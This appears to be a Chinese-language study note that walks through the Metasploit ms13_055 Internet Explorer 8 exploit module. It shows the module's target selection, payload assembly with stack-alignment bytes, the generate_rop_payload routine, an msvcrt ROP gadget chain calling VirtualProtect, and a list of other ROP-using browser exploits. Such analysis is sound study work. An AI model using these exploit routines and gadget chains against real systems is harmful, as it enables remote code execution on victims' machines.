ms13_055 metasploit

111   def get_payload(t)
112     if t[‘Rop‘] == :msvcrt
113       print_status("Using msvcrt ROP")
114       esp_align = "\x81\xc4\x54\xf2\xff\xff"
115       rop_dll = ‘msvcrt‘
116       opts    = {‘target‘=>‘xp‘}
117     else
118       print_status("Using JRE ROP")
119       esp_align = "\x81\xEC\xF0\xD8\xFF\xFF" # sub esp, -10000
120       rop_dll = ‘java‘
121       opts    = {}
122     end

  

daniel@daniel-mint ~/ms13_055 $ echo "81 c4 54 f2 ff ff" | ascii2binary -b h -t uc | x86dis -e 0 -s intel
00000000 81 C4 54 F2 FF FF            	add	esp, 0xFFFFF254

  

daniel@daniel-mint ~/ms13_055 $ echo "81 ec f0 d8 ff ff" | ascii2binary -b h -t uc | x86dis -e 0 -s intel
00000000 81 EC F0 D8 FF FF            	sub	esp, 0xFFFFD8F0

  

esp_align代表的汇编语句的作用是对齐esp,即栈指针。


 

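  # Picks the exploit target that matches the requesting browser.
  #
  # If the user chose a concrete target, it is returned unchanged. Otherwise
  # the OS and IE major version are read out of the User-Agent header (the
  # only place they can be obtained from, so they are taken as given) and
  # compared against the names in the module's target list.
  #
  # @param agent [String, nil] the request's User-Agent header; nil/empty
  #   is treated as unknown
  # @return [Msf::Module::Target, nil] the matching target, or nil when
  #   the OS or IE version is missing or has no matching target entry
  def get_target(agent)
    return target if target.name != 'Automatic'

    agent = agent.to_s
    nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''
    ie = agent.scan(/MSIE (\d)/).flatten[0] || ''
    return nil if nt.empty? || ie.empty?

    os_name = case nt
              when '5.1' then 'Windows XP SP3'
              when '6.1' then 'Windows 7'
              end
    # An NT version outside the table has nothing to match; bailing out here
    # also avoids calling include?(nil), which raises TypeError and would
    # abort the request handler instead of producing a "no target" answer.
    return nil unless os_name

    ie_name = "IE #{ie}"
    targets.find { |t| t.name.include?(ie_name) && t.name.include?(os_name) }
  end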

  

188   def on_request_uri(cli, request)
189     agent = request.headers[‘User-Agent‘]
190     t = get_target(agent)

  

当远程的网页客户端发出HTTP请求页面时,get_target会根据请求Header中的User-Agent信息来判断客户端操作系统以及浏览器的版本,然后根据预设的目标列表返回与该版本对应的数据。

 52       ‘Targets‘        =>
 53         [
 54           [ ‘Automatic‘, {} ],
 55           [
 56             ‘IE 8 on Windows XP SP3‘,
 57             {
 58               ‘Rop‘   => :msvcrt,
 59               ‘Pivot‘ => 0x77c15ed5, # xchg eax, esp; ret
 60               ‘Align‘ => 0x77c4d801  # add esp, 0x2c; ret
 61             }
 62           ],
 63           [
 64             ‘IE 8 on Windows 7‘,
 65             {
 66               ‘Rop‘   => :jre,
 67               ‘Pivot‘ => 0x7c348b05, # xchg eax, esp; ret
 68               ‘Align‘ => 0x7C3445F8  # add esp, 0x2c; ret
 69             }
 70           ]
 71         ],

  

如果当前的系统不支持,就会返回404页面。


 

  # Assembles the buffer handed to generate_rop_payload for target +t+.
  #
  # The target's 'Rop' entry selects the ROP DB module and its options:
  # :msvcrt uses the 'msvcrt' chain with the 'xp' target, anything else
  # uses the 'java' chain with default options. A six-byte stack
  # adjustment stub is prepended to the encoded payload, and 12000 bytes
  # of random alphabetic padding are appended.
  #
  # @param t [Msf::Module::Target] the target chosen by get_target
  # @return [String] whatever generate_rop_payload returns for the buffer
  def get_payload(t)
    msvcrt_chain = t['Rop'] == :msvcrt
    print_status(msvcrt_chain ? "Using msvcrt ROP" : "Using JRE ROP")

    stub, rop_dll, opts =
      if msvcrt_chain
        ["\x81\xc4\x54\xf2\xff\xff", 'msvcrt', {'target'=>'xp'}]
      else
        ["\x81\xEC\xF0\xD8\xFF\xFF", 'java', {}] # sub esp, -10000
      end

    buffer = stub + payload.encoded + rand_text_alpha(12000)
    generate_rop_payload(rop_dll, buffer, opts)
  end

  

generate_rop_payload

  # Builds a ROP chain from the ROP DB entry +rop+ and glues it to +payload+.
  #
  # The chain returned by select_rop may contain reserved symbols; each is
  # replaced by a concrete 32-bit value before packing:
  #   :nop                - a 4-byte sled word from opts['nop'], else 0x90909090
  #   :junk               - 4 random bytes honouring opts['badchars']
  #   :size               - payload.length
  #   :unsafe_negate_size - get_unsafe_size(payload.length)
  #   :safe_negate_size   - get_safe_size(payload.length)
  #
  # @param rop [String] ROP DB module name
  # @param payload [String] the payload placed after the chain
  # @param opts [Hash] 'nop', 'badchars', 'pivot', 'target', 'base'
  # @return [String] pivot + packed chain + payload
  # @raise [RuntimeError] when the packed chain is empty
  def generate_rop_payload(rop, payload, opts={})
    nop, badchars, pivot, target, base =
      opts.values_at('nop', 'badchars', 'pivot', 'target', 'base')
    nop      ||= nil
    badchars ||= ''
    pivot    ||= ''
    target   ||= ''
    base     ||= nil

    gadgets = select_rop(rop, {'target'=>target, 'base'=>base})
    size    = payload.length

    # Expand the reserved symbols into concrete dwords
    words = gadgets.map do |entry|
      case entry
      when :nop
        nop ? nop.generate_sled(4, badchars).unpack("V*")[0] : 0x90909090
      when :junk
        Rex::Text.rand_text(4, badchars).unpack("V")[0].to_i
      when :size
        size
      when :unsafe_negate_size
        get_unsafe_size(size)
      when :safe_negate_size
        get_safe_size(size)
      else
        entry
      end
    end
    chain = words.pack("V*")

    raise RuntimeError, "No ROP chain generated successfully" if chain.empty?

    pivot + chain + payload
  end

  

generate_rop_payload会从data目录下查找预先定义好的[module].xml文件,然后将gadgets中的宏定义(保留字)展开,最后以 pivot + gadgets + payload 的形式拼接返回。

  3 <rop>
  4         <compatibility>
  5                 <target>WINDOWS XP SP2</target>
  6                 <target>WINDOWS XP SP3</target>
  7         </compatibility>
  8 
  9         <gadgets base="0x77c10000">
 10                 <gadget offset="0x0002b860">POP EAX # RETN</gadget>
 11                 <gadget value="safe_negate_size">0xFFFFFBFF -> ebx</gadget>
 12                 <gadget offset="0x0000be18">NEG EAX # POP EBP # RETN</gadget>
 13                 <gadget value="junk">JUNK</gadget>
 14                 <gadget offset="0x0001362c">POP EBX # RETN</gadget>
 15                 <gadget offset="0x0004d9bb">Writable location</gadget>
 16                 <gadget offset="0x0001e071">XCHG EAX, EBX # ADD BYTE [EAX], AL # RETN</gadget>
 17                 <gadget offset="0x00040d13">POP EDX # RETN</gadget>
 18                 <gadget value="0xFFFFFFC0">0xFFFFFFC0-> edx</gadget>
 19                 <gadget offset="0x00048fbc">XCHG EAX, EDX # RETN</gadget>
 20                 <gadget offset="0x0000be18">NEG EAX # POP EBX # RETN</gadget>
 21                 <gadget value="junk">JUNK</gadget>
 22                 <gadget offset="0x00048fbc">XCHG EAX, EDX # RETN</gadget>
 23                 <gadget offset="0x0002ee15">POP EBP # RETN</gadget>
 24                 <gadget offset="0x0002ee15">skip 4 bytes</gadget>
 25                 <gadget offset="0x0002eeef">POP ECX # RETN</gadget>
 26                 <gadget offset="0x0004d9bb">Writable location</gadget>
 27                 <gadget offset="0x0001a88c">POP EDI # RETN</gadget>
 28                 <gadget offset="0x00029f92">RETN (ROP NOP)</gadget>
 29                 <gadget offset="0x0002a184">POP ESI # RETN</gadget>
 30                 <gadget offset="0x0001aacc">JMP [EAX]</gadget>
 31                 <gadget offset="0x0002b860">POP EAX # RETN</gadget>
 32                 <gadget offset="0x00001120">ptr to VirtualProtect()</gadget>
 33                 <gadget offset="0x00002df9">PUSHAD # RETN</gadget>
 34                 <gadget offset="0x00025459">ptr to ‘push esp #  ret</gadget>
 35         </gadgets>
 36 </rop>

  


 

在Windows下Browser相关的漏洞模块中查找使用了generate_rop_payload(ROP)的模块:

daniel@daniel-mint ~/msf/metasploit-framework/modules/exploits/windows/browser $ grep generate_rop_payload *.rb -n
adobe_flash_mp4_cprt.rb:148:    code = generate_rop_payload(rop_name, code, {‘target‘=>rop_target})
adobe_flash_otf_font.rb:100:      p = generate_rop_payload(‘flash‘, payload.encoded, {‘target‘=>‘11.3.300.257‘, ‘pivot‘=>pivot})
adobe_flash_otf_font.rb:110:      p = generate_rop_payload(‘flash‘, payload.encoded, {‘target‘=>‘11.3.300.265‘, ‘pivot‘=>pivot})
adobe_flash_otf_font.rb:120:      p = generate_rop_payload(‘flash‘, payload.encoded, {‘target‘=>‘11.3.300.268‘, ‘pivot‘=>pivot})
adobe_flash_otf_font.rb:130:      p = generate_rop_payload(‘java‘, payload.encoded, {‘pivot‘=>pivot})
adobe_flashplayer_flash10o.rb:194:      p = generate_rop_payload(‘java‘, payload.encoded)
adobe_flash_rtmp.rb:135:    code << generate_rop_payload(‘msvcrt‘, p, {‘target‘=>‘xp‘})
adobe_toolbutton.rb:77:    rop_10 = Rex::Text.to_unescape(generate_rop_payload(‘reader‘, ‘‘, { ‘target‘ => ‘10‘ }))
adobe_toolbutton.rb:78:    rop_11 = Rex::Text.to_unescape(generate_rop_payload(‘reader‘, ‘‘, { ‘target‘ => ‘11‘ }))
aladdin_choosefilepath_bof.rb:147:      p = generate_rop_payload(‘msvcrt‘, get_payload(cli, target_info), {‘target‘=>‘xp‘})
apple_quicktime_mime_type.rb:153:      code = generate_rop_payload(‘msvcrt‘, payload.encoded, {‘target‘=>‘xp‘})
apple_quicktime_rdrf.rb:65:    p = generate_rop_payload(‘msvcrt‘, alignment + payload.encoded, {‘target‘=>‘xp‘})
crystal_reports_printcontrol.rb:178:    rop_payload = generate_rop_payload(‘java‘, code, {‘pivot‘ => [t[‘Pivot‘]].pack("V")})
hp_loadrunner_writefilebinary.rb:207:      rop_payload = fake_object + generate_rop_payload(‘java‘, code)#, {‘pivot‘=>stack_pivot})
ie_cbutton_uaf.rb:148:        rop_payload = generate_rop_payload(‘msvcrt‘, msvcrt_align + code, {‘target‘=>‘xp‘})
ie_cbutton_uaf.rb:150:        rop_payload = generate_rop_payload(‘msvcrt‘, msvcrt_align + code, {‘target‘=>‘2003‘})
ie_cbutton_uaf.rb:153:      rop_payload = generate_rop_payload(‘java‘, java_align + code)
ie_cgenericelement_uaf.rb:126:        rop_payload = generate_rop_payload(‘msvcrt‘, align+p, {‘target‘=>‘xp‘})
ie_cgenericelement_uaf.rb:128:        rop_payload = generate_rop_payload(‘msvcrt‘, align+p, {‘target‘=>‘2003‘})
ie_cgenericelement_uaf.rb:136:      rop_payload = generate_rop_payload(‘java‘, code)
ie_execcommand_uaf.rb:139:      rop_payload = generate_rop_payload(‘msvcrt‘, code, {‘pivot‘=>stack_pivot, ‘target‘=>‘xp‘})
ie_execcommand_uaf.rb:158:      rop_payload = generate_rop_payload(‘java‘, code, {‘pivot‘=>stack_pivot})
ie_setmousecapture_uaf.rb:98:      rop = generate_rop_payload(‘hxds‘, code, { ‘target‘=>‘2007‘ })
ie_setmousecapture_uaf.rb:112:      rop = generate_rop_payload(‘hxds‘, code, { ‘target‘=>‘2010‘ })
indusoft_issymbol_internationalseparator.rb:219:      rop_payload = generate_rop_payload(‘msvcrt‘, code,  {‘pivot‘=>stack_pivot, ‘target‘=>‘xp‘})
indusoft_issymbol_internationalseparator.rb:231:      rop_payload = generate_rop_payload(‘java‘, code, {‘pivot‘=>stack_pivot})
inotes_dwa85w_bof.rb:204:      rop_payload = generate_rop_payload(‘msvcrt‘, code, {‘target‘=>‘xp‘})#{‘pivot‘=>stack_pivot, ‘target‘=>‘xp‘})
mozilla_firefox_onreadystatechange.rb:108:    code << generate_rop_payload(‘msvcrt‘, stack_pivot + payload.encoded, {‘target‘=>‘xp‘})
mozilla_firefox_xmlserializer.rb:110:    code << generate_rop_payload(‘msvcrt‘, stack_pivot + payload.encoded, {‘target‘=>‘xp‘})
ms10_002_ie_object.rb:248:      rop_payload = generate_rop_payload(‘msvcrt‘, p, {‘target‘=>‘xp‘})
ms10_002_ie_object.rb:250:      rop_payload = generate_rop_payload(‘java‘, p)
ms11_050_mshtml_cobjectelement.rb:182:      rop_payload = generate_rop_payload(‘java‘, p)
ms11_081_option.rb:137:      rop_payload = generate_rop_payload(‘msvcrt‘, "", {‘target‘=>‘xp‘})
ms11_081_option.rb:144:      rop_payload = generate_rop_payload(‘java‘, ‘‘)
ms12_004_midi.rb:519:    generate_rop_payload(‘msvcrt‘, p, {‘pivot‘=>padding, ‘target‘=>‘xp‘})
ms12_037_same_id.rb:133:      rop = generate_rop_payload(‘msvcrt‘, ‘‘, {‘target‘=>‘xp‘, ‘pivot‘=>pivot})
ms12_037_same_id.rb:137:      rop = generate_rop_payload(‘java‘, ‘‘, {‘pivot‘=>pivot})
ms13_009_ie_slayoutrun_uaf.rb:128:      rop_payload = generate_rop_payload(‘msvcrt‘, "", {‘target‘=>‘xp‘})
ms13_037_svg_dashstyle.rb:218:      rop_payload = generate_rop_payload(‘java‘, code, {‘pivot‘=>stack_pivot})
ms13_055_canchor.rb:125:    generate_rop_payload(rop_dll, p, opts)
ms13_059_cflatmarkuppointer.rb:120:    generate_rop_payload(‘java‘, code, {‘pivot‘=>stack_pivot})
ms13_069_caret.rb:97:    p << generate_rop_payload(‘msvcrt‘, payload.encoded, {‘target‘=>‘xp‘})
ms13_080_cdisplaypointer.rb:157:      rop_payload = generate_rop_payload(‘hxds‘, payload.encoded, {‘target‘=>‘2007‘, ‘pivot‘=>pivot})
ms13_080_cdisplaypointer.rb:174:      rop_payload = generate_rop_payload(‘hxds‘, payload.encoded, {‘target‘=>‘2010‘, ‘pivot‘=>pivot})
ms13_080_cdisplaypointer.rb:186:        rop_payload = generate_rop_payload(‘msvcrt‘, payload.encoded, {‘target‘=>‘xp‘, ‘pivot‘=>pivot})
ms13_080_cdisplaypointer.rb:197:        rop_payload = generate_rop_payload(‘java‘, payload.encoded, {‘pivot‘=>pivot})
ms13_090_cardspacesigninhelper.rb:108:    rop_payload = generate_rop_payload(‘msvcrt‘, get_payload(cli, target_info), {‘target‘=>‘xp‘, ‘pivot‘ => stack_pivot})
ms14_012_textrange.rb:85:    p = generate_rop_payload(‘hxds‘, payload.encoded, {‘target‘=>‘2010‘, ‘pivot‘=>setup})
msxml_get_definition_code_exec.rb:189:        rop = generate_rop_payload(‘msvcrt‘,‘‘,{‘target‘=>‘xp‘, ‘pivot‘=>adjust})
msxml_get_definition_code_exec.rb:193:        rop = generate_rop_payload(‘java‘,‘‘,{‘pivot‘=>adjust})
novell_groupwise_gwcls1_actvx.rb:207:        rop_payload = generate_rop_payload(‘msvcrt‘, ‘‘, ‘target‘=>‘xp‘) # Mapped at 0x0c0c07ea
novell_groupwise_gwcls1_actvx.rb:217:        rop_payload = generate_rop_payload(‘java‘, ‘‘) # Mapped at 0x0c0c07ea
ntr_activex_check_bof.rb:270:        rop_payload = generate_rop_payload(‘msvcrt‘, code, {‘target‘=>‘xp‘})
ntr_activex_check_bof.rb:274:        rop_payload = generate_rop_payload(‘java‘, code)
quickr_qp2_bof.rb:202:      rop_payload = generate_rop_payload(‘java‘, code)#, {‘pivot‘=>stack_pivot})
siemens_solid_edge_selistctrlx.rb:398:    return generate_rop_payload(‘msvcrt‘, payload.encoded, {‘pivot‘=> fake_memory, ‘target‘=>‘xp‘})
vlc_amv.rb:143:      code = generate_rop_payload(‘java‘, payload.encoded)

  

 


